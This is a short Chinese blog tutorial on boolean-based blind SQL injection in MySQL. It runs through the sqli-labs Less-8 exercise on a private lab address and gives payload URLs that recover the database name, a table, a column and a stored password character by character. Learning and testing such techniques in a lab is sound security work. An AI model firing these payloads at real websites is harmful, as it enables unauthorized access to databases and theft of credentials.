Mysql注入 -- 布尔注入 - Kirin博客

Mysql注入 -- 布尔注入

作者: Bee

全网最全的网络资源分享网站

标签:

mysql注入

特别声明:部分文章为网络转载,资源使用一般不提供任何帮助,特殊资源除外,如有侵权请联系站长!请勿违法!本站文章仅供学习了解!技术无罪!

流量卡广告 Kirin影视 联系站长QQ

一、常用函数

1、mid(str,1,5):取字符串str的前5个字节

2、ord():转换成ASCII码

3、length():统计长度

4、 ascii():将字符转换ASCII

二、实例演示

1、and 1=1

访问http://192.168.139.129/sqli/Less-8/?id=1' and 1=1 --+ 返回正确


2、and 1=2

访问http://192.168.139.129/sqli/Less-8/?id=1' and 1=2 --+ 返回错误


3、判断数据库长度

http://192.168.139.129/sqli/Less-8/?id=1' and length(database())>=8 --+返回正常,说明数据库长度为8http://192.168.139.129/sqli/Less-8/?id=1' and length(database())>=9 --+返回错误

4、判断数据库第一个字母

http://192.168.139.129/sqli/Less-8/?id=1' and mid(database(),1,1)='s' --+ 不停的修改二十六个字母,知道正确为之

5、判断数据库第二个字母

http://192.168.139.129/sqli/Less-8/?id=1' and mid(database(),2,1)='e' --+ 最终获取数据库的名称为“security”

6、获取表名,最终获取表名users

http://192.168.139.129/sqli/Less-8/?id=1' and mid((select table_name from information_schema.tables where table_schema=database() limit 3,1),1,1)='u' --+

7、获取字段名,最终获取字段名password

http://192.168.139.129/sqli/Less-8/?id=1' and mid((select column_name from information_schema.columns where table_name='users' limit 12,1),1,1)='p' --+

8、获取字段内容,最终获取一个名为admin的内容

http://192.168.139.129/sqli/Less-8/?id=1' and mid((select password from users limit 8,1),1,1)='a' --+

禁止非法,后果自负

分享到:
加入交流群
未经允许不得转载:

作者: Bee, 转载或复制请以 超链接形式 并注明出处 Kirin博客
原文地址: 《Mysql注入 -- 布尔注入》 发布于2021-5-15

切换注册

登录

您也可以使用第三方帐号快捷登录

切换登录

注册

觉得文章有用就加入交流群吧

QQ扫一扫